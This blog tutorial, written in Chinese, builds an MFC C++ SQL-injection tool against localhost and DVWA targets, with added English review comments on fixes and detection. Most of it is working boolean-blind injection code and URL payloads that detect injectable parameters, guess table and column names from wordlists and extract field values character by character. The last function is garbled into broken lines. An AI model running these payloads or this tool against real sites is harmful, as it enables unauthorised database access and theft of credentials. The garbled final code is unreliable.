网络安全编程:开发SQL注入工具
Posted 计算机与网络安全
Select * from user where username='admin' and password='123456'
http://localhost/article.php?id=1
Select * from article where id = 1
Select * from article where id = '1'
Select * from article where title like '%微信公众号:计算机与网络安全%'
http://localhost/article.php?id=1
// Vulnerable example, quoted variant: the request parameter is spliced straight into
// the SQL text, so a single quote inside `id` closes the literal and whatever follows
// is executed as SQL (this is the hole the rest of the article probes).
// Mitigation: a prepared statement with a bound parameter (mysqli or PDO), so the
// value is never parsed as SQL; note that the mysql_* extension used here was removed
// in PHP 7.
$id = $_GET['id'];
$sql = "select * from article where id = '" . $id . "'";
mysql_query($sql);
// Vulnerable example, numeric variant: no quotes around the value, so no quote is
// needed to break out — anything appended after a number is already part of the
// SQL expression.
// Mitigation: validate/cast to an integer before use, or bind it as a parameter in a
// prepared statement; string concatenation of request data into SQL is the defect,
// not the missing quotes.
$id = $_GET['id'];
$sql = "select * from article where id = " . $id;
Mysql_query($sql);
http://localhost/article.php?id=1 and 1=1
http://localhost/article.php?id=1' and '1'='1
http://localhost/article.php?id=1 and 1=2
http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1
// Button 1 handler: runs the probe type selected by m_nSel against the URL typed
// into the dialog. Reads the target URL from IDC_EDIT1 and the marker text into the
// member m_strSign from IDC_EDIT2; the marker is the string whose presence in a
// response is taken to mean "the injected condition evaluated true".
// The BOOL result of AfxParseURL is not checked, so a malformed URL silently yields
// empty server/object strings. dwServiceType and nPort are parsed but never acted
// on downstream: Check always speaks plain HTTP on port 80.
void CSQLInjectToolsDlg::OnBnClickedButton1()
{
// TODO: add control notification handler code here
CString strUrl;
GetDlgItemText(IDC_EDIT1, strUrl);
GetDlgItemText(IDC_EDIT2, m_strSign);
DWORD dwServiceType; // service type (URL scheme)
CString strServer; // server address
CString strObject; // the object (path + query) the URL points to
INTERNET_PORT nPort; // port number
AfxParseURL(strUrl, dwServiceType, strServer, strObject, nPort);
CheckInject(strServer, strObject, nPort);
}
// Dispatches one boolean-based probe according to m_nSel (1 = quoted/character
// context, 2 = unquoted/numeric context, 3 = LIKE/search context; presumably set by
// a selection control elsewhere in the dialog — not visible here) and records the
// verdict in m_ScanList as "<url>[存在]" (injectable) or "<url>[不存在]".
// nPort is accepted but unused: Check hard-codes port 80.
// In the default branch the bare URL is still appended to the list after the message
// box (line at the end of the function), so an untested URL shows up looking like a
// result without a verdict suffix.
// NOTE(review): the parameter type INTERNET_PORT is wrapped across two lines in this
// listing (extraction artifact); it is one token in the compiled source.
void CSQLInjectToolsDlg::CheckInject(CString strServer, CString strObject, INTERNET_
PORT nPort)
{
CString strUrl;
strUrl = "http://" + strServer + strObject;
switch ( m_nSel )
{
case 1:
{
// Quoted context: pCharText pair (URL-encoded "' and '1'='1" vs "' and '1'='2").
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "测试字符型");
if ( Check(strServer, strObject, pCharText[0], pCharText[1]) )
{
strUrl = strUrl + "[存在]";
}
else
{
strUrl = strUrl + "[不存在]";
}
break;
}
case 2:
{
// Numeric context: pNumText pair (" and 1=1" vs " and 1=2").
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "测试数值型");
if ( Check(strServer, strObject, pNumText[0], pNumText[1]) )
{
strUrl = strUrl + "[存在]";
}
else
{
strUrl = strUrl + "[不存在]";
}
break;
}
case 3:
{
// Search (LIKE '%...%') context: pSearchText pair.
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "测试搜索型");
if ( Check(strServer, strObject, pSearchText[0], pSearchText[1]) )
{
strUrl = strUrl + "[存在]";
}
else
{
strUrl = strUrl + "[不存在]";
}
break;
}
default:
{
// No test type selected; the URL is still listed below without a verdict.
AfxMessageBox("请选择测试类型!!");
break;
}
}
m_ScanList.InsertItem(m_ScanList.GetItemCount(), strUrl);
// closesocket(m_sock);
}
// Boolean-based check: issues two GET requests whose query strings differ only in
// the appended payload (str11 = always-true condition, str12 = always-false
// condition) and returns TRUE only when the marker m_strSign is present in the
// first response and absent from the second, i.e. when page content follows the
// injected condition.
//
// Seen from the server this is a distinctive pattern — two back-to-back GETs on
// fresh TCP connections, identical fixed headers, query strings differing only in
// a "1=1"/"1=2" tail — which a WAF rule or request-log analysis can key on. The
// application-side fix is parameterised queries (see the PHP at the top of the
// page); response-content differences are the whole signal this check relies on.
//
// Review notes on the implementation:
// - socket/connect/send/recv results are never checked: a connection failure leaves
//   szRecvPacket empty, which is reported as "[不存在]" rather than as an error.
// - recv is asked for all 0x2048 bytes of the 0x2048-byte array, so a response that
//   fills the buffer leaves no NUL terminator and the CString constructor on the
//   following line can read past the array; request at most sizeof(buf) - 1 bytes.
// - Only one recv per request: only the first received segment is searched for the
//   marker, and HttpGet advertises gzip/deflate, so a compressed body would never
//   match as plain text.
// - Port 80 is hard-coded and inet_addr only accepts a dotted IPv4 literal, so a
//   host name or an https URL does not connect.
// - GetBuffer(0) is never paired with ReleaseBuffer(); harmless here because the
//   buffers are only read, but the two conventionally go together.
BOOL CSQLInjectToolsDlg::Check(CString strServer, CString strObject, CString str11,
CString str12)
{
BOOL bRet = FALSE;
char szSendPacket[1024] = { 0 };
char szRecvPacket[0x2048] = { 0 };
CString strUrl;
m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in ServerAddr = { 0 };
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = htons(80);
ServerAddr.sin_addr.S_un.S_addr = inet_addr(strServer);
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
// true-condition probe
strUrl = strObject + str11;
HttpGet(szSendPacket, strUrl.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket_11 = szRecvPacket;
closesocket(m_sock);
// New socket for the second request: HttpGet sends "Connection: close".
m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
// false-condition probe
strUrl = strObject + str12;
ZeroMemory(szSendPacket, 1024);
ZeroMemory(szRecvPacket, 0x2048);
HttpGet(szSendPacket, strUrl.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket_12 = szRecvPacket;
closesocket(m_sock);
// Injectable only if the marker tracks the condition: found (Find != -1) for the
// true probe and not found for the false probe.
if ( strPacket_11.Find(m_strSign) != -1 && strPacket_12.Find(m_strSign) == -1 )
{
bRet = TRUE;
}
return bRet;
}
// Formats a raw HTTP/1.1 GET request into strGetPacket (callers pass a 1024-byte
// array): strUrl is the request target (path + query, URL-encoded by the caller)
// and strHost fills the Host header. Every other header is a fixed literal,
// including a hard-coded Cookie (DVWA "security=low" plus a PHPSESSID) and a
// localhost DVWA Referer — a session identifier committed in source, and a constant
// fingerprint that a server-side log rule can match across every request the tool
// sends. "Connection: close" is why callers open a new socket per request.
// Accept-Encoding advertises gzip/deflate although callers string-search the raw
// response, so a server that honours it defeats the marker match.
// wsprintf's output is limited to 1024 characters, which is also the caller's
// buffer size; a length-taking formatter (e.g. StringCchPrintf) would make the
// bound explicit. The three inputs are only read, so const char* would be the
// accurate parameter type.
// NOTE(review): the Accept, User-Agent and Cookie literals are wrapped mid-literal
// in this listing (extraction artifact); they are single lines in the compiled source.
void CSQLInjectToolsDlg::HttpGet(char* strGetPacket, char* strUrl, char* strHost)
{
wsprintf(strGetPacket, "GET %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,
*/*;q=0.8\r\n"
"Upgrade-Insecure-Requests: 1\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/50.0.2661.102 Safari/537.36\r\n"
"Referer: http://localhost/dvwa-1.9/vulnerabilities/sqli/\r\n"
"Accept-Encoding: gzip, deflate, sdch\r\n"
"Accept-Language: zh-CN,zh;q=0.8\r\n"
"Cookie: security=low; pgv_pvi=8928542720; Hm_lvt_0a8b0d0d0f05cb8727db5cc8d
1f0dc08=1505118977; a5787_times=1; a3564_times=1; pageNo=1; pageSize=30;
Hm_lvt_82116c626a8d504a5c0675073362ef6f=1508373269,1508719861,1508806033,
1508821087; PHPSESSID=jn0pc2a4eubcd400m4bh6nv1n2\r\n"
"Connection: close\r\n\r\n", strUrl, strHost);
}
// Payload pairs used by CheckInject/Check: element [0] appends an always-true
// condition, element [1] an always-false one, so that a page which follows the
// injected condition differs between the two responses. They are already
// URL-encoded for direct use in the query string (%27 = ', %25 = %, + = space).
// Binding a string literal to a non-const char* is ill-formed in C++11 and later;
// const char* is the correct element type (the callers only read them).
// Character (quoted) context
char *pCharText[] =
{
"%27+and+%271%27=%271",
"%27+and+%271%27=%272"
};
// Numeric (unquoted) context
char *pNumText[] =
{
" and 1=1",
" and 1=2"
};
// Search (LIKE '%...%') context
char *pSearchText[] =
{
"%25%27+and+1=1+and+%27%25%27=%27%25",
"%25%27+and+1=2+and+%27%25%27=%27%25"
};
Select firstname, surname from 表名 where id = '1' and exists(select * from users) and '1'='1'
// Button 2 handler: probes each candidate in the global `tables` array (declared
// further down in this listing) by appending, URL-encoded, a
// "' and exists(select * from <name>) and '1'='1" tail to the request object and
// lists the name with "[存在该表]" when the marker m_strSign appears in the response.
// sizeof(tables)/MAXBYTE is the element count because every row of the array is
// MAXBYTE bytes wide.
// Same caveats as Check: socket/connect/send/recv are unchecked (a failed connection
// is indistinguishable from "table absent"), recv may fill szRecvPacket with no room
// for the terminator, only the first received segment is searched, port 80 is
// hard-coded, and the parsed nPort/dwServiceType are unused. One request per
// candidate, each on a new connection, is the pattern a server-side rate or
// pattern rule would see.
void CSQLInjectToolsDlg::OnBnClickedButton2()
{
// TODO: add control notification handler code here
CString strUrl;
GetDlgItemText(IDC_EDIT1, strUrl);
GetDlgItemText(IDC_EDIT2, m_strSign);
DWORD dwServiceType; // service type (URL scheme)
CString strServer; // server address
CString strObject; // the object (path + query) the URL points to
INTERNET_PORT nPort; // port number
AfxParseURL(strUrl, dwServiceType, strServer, strObject, nPort);
int nTable = sizeof(tables) / MAXBYTE;
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "开始猜表名");
for ( int i = 0; i < nTable; i++ )
{
CString strUrl_1;
// and (select count(*) from user) > 0
// %%27 / %%28 / %%29 are literal %27 %28 %29 (' ( ) ) after Format's %% escape.
strUrl_1.Format("%s%%27+and+exists%%28select+*+from+%s%%29+and+%%271%%27=%%271",
strObject, tables[i]);
m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in ServerAddr = { 0 };
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = htons(80);
ServerAddr.sin_addr.S_un.S_addr = inet_addr(strServer);
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
char szSendPacket[1024] = { 0 };
char szRecvPacket[0x2048] = { 0 };
HttpGet(szSendPacket, strUrl_1.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket;
strPacket = szRecvPacket;
CString tab = tables[i];
// Marker present => the EXISTS subquery did not error, i.e. the table exists.
if ( strPacket.Find(m_strSign) != -1 )
{
tab = tab + "[存在该表]";
}
m_ScanList.InsertItem(m_ScanList.GetItemCount(), tab);
closesocket(m_sock);
}
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "结束猜表名");
}
strUrl_1.Format("%s%%27+and+exists%%28select+*+from+%s%%29+and+%%271%%27=%%271",
strObject, tables[i]);
// Candidate names for the guessing loops (buttons 2 and 3). Each row is MAXBYTE
// bytes wide, so sizeof(array)/MAXBYTE is the entry count the callers compute.
// Table-name candidates
char tables[][MAXBYTE] = { "admin", "manage", "users", "user", "guestbook", "note"};
// Column-name candidates
char columns[][MAXBYTE] = { "id", "user", "username", "pass", "pwd", "password"};
// Button 3 handler: for the table name typed into IDC_EDIT3, probes each candidate
// in the global `columns` array with a URL-encoded
// "' and (select count(<col>) from <table>)>0 and '1'='1" tail and lists the
// candidate with "[存在该列]" when the marker m_strSign appears in the response.
// sizeof(columns)/MAXBYTE is the element count (rows are MAXBYTE bytes wide).
// Same caveats as Check: unchecked socket calls (failure reads as "column absent"),
// recv sized to the full buffer, only the first segment searched, port 80 hard-coded,
// nPort/dwServiceType unused.
// NOTE(review): the Format literal below is wrapped mid-literal in this listing
// (extraction artifact); it is one line in the compiled source.
void CSQLInjectToolsDlg::OnBnClickedButton3()
{
// TODO: add control notification handler code here
CString strTable;
CString strUrl;
GetDlgItemText(IDC_EDIT1, strUrl);
GetDlgItemText(IDC_EDIT2, m_strSign);
GetDlgItemText(IDC_EDIT3, strTable); // table name to probe against
DWORD dwServiceType; // service type (URL scheme)
CString strServer; // server address
CString strObject; // the object (path + query) the URL points to
INTERNET_PORT nPort; // port number
AfxParseURL(strUrl, dwServiceType, strServer, strObject, nPort);
int nColumns = sizeof(columns) / MAXBYTE;
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "开始猜列名");
for ( int i = 0; i < nColumns; i++ )
{
CString strUrl_1;
// and (select count(id) from user) > 0
strUrl_1.Format("%s%%27+and+%%28select+count%%28%s%%29+from+%s%%29>0+and+
%%271%%27=%%271", strObject, columns[i], strTable);
m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in ServerAddr = { 0 };
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = htons(80);
ServerAddr.sin_addr.S_un.S_addr = inet_addr(strServer);
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
char szSendPacket[1024] = { 0 };
char szRecvPacket[0x2048] = { 0 };
HttpGet(szSendPacket, strUrl_1.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket;
strPacket = szRecvPacket;
CString col = columns[i];
// Marker present => the subquery ran, i.e. the column exists in strTable.
if ( strPacket.Find(m_strSign) != -1 )
{
col = col + "[存在该列]";
}
m_ScanList.InsertItem(m_ScanList.GetItemCount(), col);
closesocket(m_sock);
}
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "结束猜列名");
}
1' and (select count(password) from users)>0 and '1'='1
1' and (select length(user) from users limit 0,1)=5 and '1'='1
strUrl.format("1' and (select length(字段名) from 表名 limit %s,1)=%d and '1'='1",n, len);
// 字段值
1' and (select ascii(mid(user, 1, 1)) from users limit 0, 1) = 97 and '1'='1
1' and (select ascii(mid(user, 2, 1)) from users limit 0, 1) = 100 and '1'='1
1' and (select ascii(mid(user, 3, 1)) from users limit 0, 1) = 109 and '1'='1
1' and (select ascii(mid(user, 4, 1)) from users limit 0, 1) = 105 and '1'='1
1' and (select ascii(mid(user, 5, 1)) from users limit 0, 1) = 110 and '1'='1
// Button 4 handler: guesses the length of one field value. For nLen = 1..64 it sends
// a URL-encoded "' and (select length(<field>) from <table> limit <row>,1)=<nLen>
// and '1'='1" tail and stops at the first nLen whose response contains the marker
// m_strSign. Table, field and row offset come from IDC_EDIT3/4/5; the row offset
// strNum is a CString passed for %s, which CString::Format accepts via its LPCTSTR
// conversion.
// Defect: if no length in 1..64 matches, the loop falls out with nLen == 65 and that
// value is listed as though it were a result; a "not found" entry is needed.
// Same caveats as Check: unchecked socket calls, recv sized to the full buffer, only
// the first segment searched, port 80 hard-coded, nPort/dwServiceType unused. Up to
// 64 near-identical requests differing only in the "=<n>" comparand is the
// server-side signature of this loop.
// NOTE(review): the Format literal below is wrapped mid-literal in this listing
// (extraction artifact); it is one line in the compiled source.
void CSQLInjectToolsDlg::OnBnClickedButton4()
{
// TODO: add control notification handler code here
CString strTable;
CString strField;
CString strUrl;
CString strNum;
GetDlgItemText(IDC_EDIT1, strUrl);
GetDlgItemText(IDC_EDIT2, m_strSign);
GetDlgItemText(IDC_EDIT3, strTable); // table name to probe against
GetDlgItemText(IDC_EDIT4, strField); // column name
GetDlgItemText(IDC_EDIT5, strNum); // which row to probe (LIMIT offset)
DWORD dwServiceType; // service type (URL scheme)
CString strServer; // server address
CString strObject; // the object (path + query) the URL points to
INTERNET_PORT nPort; // port number
AfxParseURL(strUrl, dwServiceType, strServer, strObject, nPort);
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "开始猜列值长度");
// find the length
int nLen = 1;
while ( nLen <= 64 )
{
CString strUrl_1;
// and (select length(username) from user limit 1) = 5
strUrl_1.Format("%s%%27+and+%%28select+length%%28%s%%29+from+%s+limit+%s%%2
C1%%29=%d+and+%%271%%27=%%271", strObject, strField, strTable, strNum, nLen);
m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in ServerAddr = { 0 };
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = htons(80);
ServerAddr.sin_addr.S_un.S_addr = inet_addr(strServer);
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
char szSendPacket[1024] = { 0 };
char szRecvPacket[0x2048] = { 0 };
HttpGet(szSendPacket, strUrl_1.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket;
strPacket = szRecvPacket;
// Marker present => the length comparison held; nLen is left at the match.
if ( strPacket.Find(m_strSign) != -1 )
{
closesocket(m_sock);
break;
}
closesocket(m_sock);
nLen ++;
}
// Reported even when the loop exhausted 1..64 without a match (nLen == 65).
CString num;
num.Format("%d", nLen);
m_ScanList.InsertItem(m_ScanList.GetItemCount(), num);
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "结束猜列值长度");
}
void CSQLInjectToolsDlg::OnBnClickedButton5()
{
// 在此添加控件通知处理程序代码
CString strTable;
CString strField;
CString strUrl;
CString strNum;
int nLen;
GetDlgItemText(IDC_EDIT1, strUrl);
GetDlgItemText(IDC_EDIT2, m_strSign);
GetDlgItemText(IDC_EDIT3, strTable); // 获取猜解表名
GetDlgItemText(IDC_EDIT4, strField); // 列名
GetDlgItemText(IDC_EDIT5, strNum); // 猜解第几行
GetDlgItemInt(IDC_EDIT6); =
DWORD dwServiceType; // 服务类型
CString strServer; // 服务器地址
CString strObject; // URL 指向的对象
INTERNET_PORT nPort; // 端口号
AfxParseURL(strUrl, dwServiceType, strServer, strObject, nPort);
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "开始猜列值");
CString strValue;
1; =
CString username;
// 长度用于猜解每一位
nLen ) =
{
// 这里猜解只猜解小写的字母
// 这里在实际的时候需要改成各种可能的字符
97; c < 122; c ++ ) =
{
CString strUrl_1;
97 =
strUrl_1.Format("%s%%27+and+%%28select+ascii%%28mid%%28%s,%d,1%%29%%29+
%d+and+%%271%%27=%%271", =
strObject, strField, i, strTable, strNum, c);
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); =
{ 0 }; =
AF_INET; =
htons(80); =
inet_addr(strServer); =
connect(m_sock, (const sockaddr *)&ServerAddr, sizeof(ServerAddr));
{ 0 }; =
{ 0 }; =
HttpGet(szSendPacket, strUrl_1.GetBuffer(0), strServer.GetBuffer(0));
send(m_sock, szSendPacket, strlen(szSendPacket), 0);
recv(m_sock, szRecvPacket, 0x2048, 0);
CString strPacket;
szRecvPacket; =
-1 ) =
{
// 拼接猜解的每一位用户名
username.Format("%s%c", username, c);
closesocket(m_sock);
break;
}
closesocket(m_sock);
}
i ++;
}
username + "[猜解结果]"; =
m_ScanList.InsertItem(m_ScanList.GetItemCount(), username);
m_ScanList.InsertItem(m_ScanList.GetItemCount(), "结束猜列值");